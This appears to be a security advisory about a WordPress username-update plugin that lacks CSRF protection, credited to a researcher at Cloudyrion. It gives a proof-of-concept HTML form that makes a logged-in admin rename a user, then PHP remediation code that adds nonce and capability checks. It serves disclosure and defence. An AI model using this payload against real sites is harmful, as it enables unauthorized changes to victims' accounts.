The plugin does not implement CSRF checks, which could allow attackers to make a logged-in admin change any user's username, including the admin's.
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=eup_username_update&update=3" method="POST">
      <input type="hidden" name="user_login" value="newusername" />
      <input type="hidden" name="submit" value="Update Username" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
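The missing check, sketched as an added example (this is not the plugin's own code): a handler for the same request that ties the form to a WordPress nonce and verifies it, together with the caller's capability, before changing anything. The function names, the nonce action and field name, and the direct `$wpdb` write to `user_login` are assumptions; the `page`, `update`, `user_login` and `submit` parameters are the ones in the request above.

```php
<?php
// Added example. example_* names and the nonce action/field are hypothetical.

// Render the form with a nonce bound to the user ID being edited.
function example_render_username_form( $user_id ) {
    $user = get_userdata( $user_id );
    if ( ! $user ) {
        wp_die( 'Unknown user.' );
    }
    ?>
    <form method="post">
        <?php wp_nonce_field( 'example_update_username_' . $user_id, 'example_nonce' ); ?>
        <input type="text" name="user_login" value="<?php echo esc_attr( $user->user_login ); ?>" />
        <input type="submit" name="submit" value="Update Username" />
    </form>
    <?php
}

// Process the POST: scope to this page, check capability, check nonce, validate.
function example_handle_username_update() {
    global $wpdb;

    if ( ! isset( $_GET['page'] ) || 'eup_username_update' !== $_GET['page'] ) {
        return;
    }
    if ( ! isset( $_POST['submit'], $_POST['user_login'], $_GET['update'] ) ) {
        return;
    }
    $user_id = absint( $_GET['update'] );

    if ( ! current_user_can( 'edit_user', $user_id ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // Stops the request when the nonce is absent or invalid, as it is
    // for a form auto-submitted from another origin.
    check_admin_referer( 'example_update_username_' . $user_id, 'example_nonce' );

    $new_login = sanitize_user( wp_unslash( $_POST['user_login'] ), true );
    if ( '' === $new_login || ! validate_username( $new_login ) || username_exists( $new_login ) ) {
        wp_die( 'Invalid or already used username.' );
    }

    // Assumption: the login is written directly, since wp_update_user() does not change user_login.
    $wpdb->update( $wpdb->users, array( 'user_login' => $new_login ), array( 'ID' => $user_id ), array( '%s' ), array( '%d' ) );
    clean_user_cache( $user_id );
}
add_action( 'admin_init', 'example_handle_username_update' );
```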
Raad Haddad of Cloudyrion GmbH
Yes
2022-07-18 (about 6 months ago)
2022-08-22 (about 5 months ago)